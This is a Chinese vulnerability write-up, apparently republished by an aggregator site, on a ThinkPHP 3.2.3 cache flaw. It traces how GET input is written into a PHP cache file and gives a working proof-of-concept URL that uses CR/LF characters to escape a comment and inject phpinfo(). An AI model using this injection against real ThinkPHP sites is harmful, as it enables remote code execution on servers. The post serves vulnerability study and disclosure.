thinkphp3缓存漏洞
脚本宝典收集整理的这篇文章主要介绍了thinkphp3缓存漏洞,脚本宝典觉得挺不错的,现在分享给大家,也给大家做个参考。
配置控制器Application/Home/Controller/IndexController.class.php
<?php
namespace HomeController;
use ThinkController;
class IndexController extends Controller
{
public function index(){
$data=I('get.data');
S('data',$data);
}
}
我们在浏览器访问http://127.0.0.1/thinkphp-3.2.3/?data=spring
发现生成缓存文件Application/Runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
8d777f385d3dfec8815d20f7496026dc就是S('data',$data);中data的MD5
代码分析
打断点进入S()方法
return $cache->set($name, $value, $expire);
文件名来自filename()函数,在有源码的情况下这是已知的
$data来自序列化之后的$value,$value可控
$data = serialize($value);
现在的$data是"s:6:"spring";"
接下来的这段代码是写入文件的关键
$data = "<?phpn//" . sprintf('%012d', $expire) . $check . $data . "n?>";
$result = file_put_contents($filename, $data);
这里使用了file_put_contents()函数,另外写入的部分用了//注释符防止其被解析,但我们可以使用换行符等进行绕过
所以最终我们的POC为http://127.0.0.1/thinkphp-3.2.3/?data=%0d%0aphpinfo();%0d%0a//
0x0d - r, carrige return 回车 0x0a - n, new line 换行 Windows 中换行为0d 0a UNIX 换行为 0a
因为ThinkPHP3的入口文件位于根目录下,和 application 等目录在同一目录下,导致系统很多文件都可以访问,跟日志泄露一样,这里生成的缓存文件也是可以直接访问的
访问http://127.0.0.1/thinkphp-3.2.3/Application/runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php可见
缓存文件内容为
<?php
//000000000000s:16:"
phpinfo();
//";
?>
参考链接
- https://www.freebuf.com/vuls/282906.html
- https://zhuanlan.zhihu.com/p/28554803
END
建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注 😃
脚本宝典总结
以上是脚本宝典为你收集整理的thinkphp3缓存漏洞全部内容,希望文章能够帮你解决thinkphp3缓存漏洞所遇到的问题。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。
- clion结合vcpkg以及GTest的使用 2022-07-07
- EGF 2022-06-06
- ExtJS 布局-Column布局(Column layout) 2022-06-05
- 颜色之ARGB与RGB、RGBA的区别与介绍 2022-04-15
- rgba中的a是什么意思 CSS之RGBA颜色指南 2022-04-15
- rootfs -根文件系统制作 2022-07-07
- 网页简单布局之结构与表现原则分享 2022-04-15
- 小项目中怎么防止Vue的闪现画面效果 2022-04-15
- 隐藏 Web 中的元素方法及优缺点教程详解 2022-04-15
- 告别硬编码让你的前端表格自动计算的实例代码 2022-04-15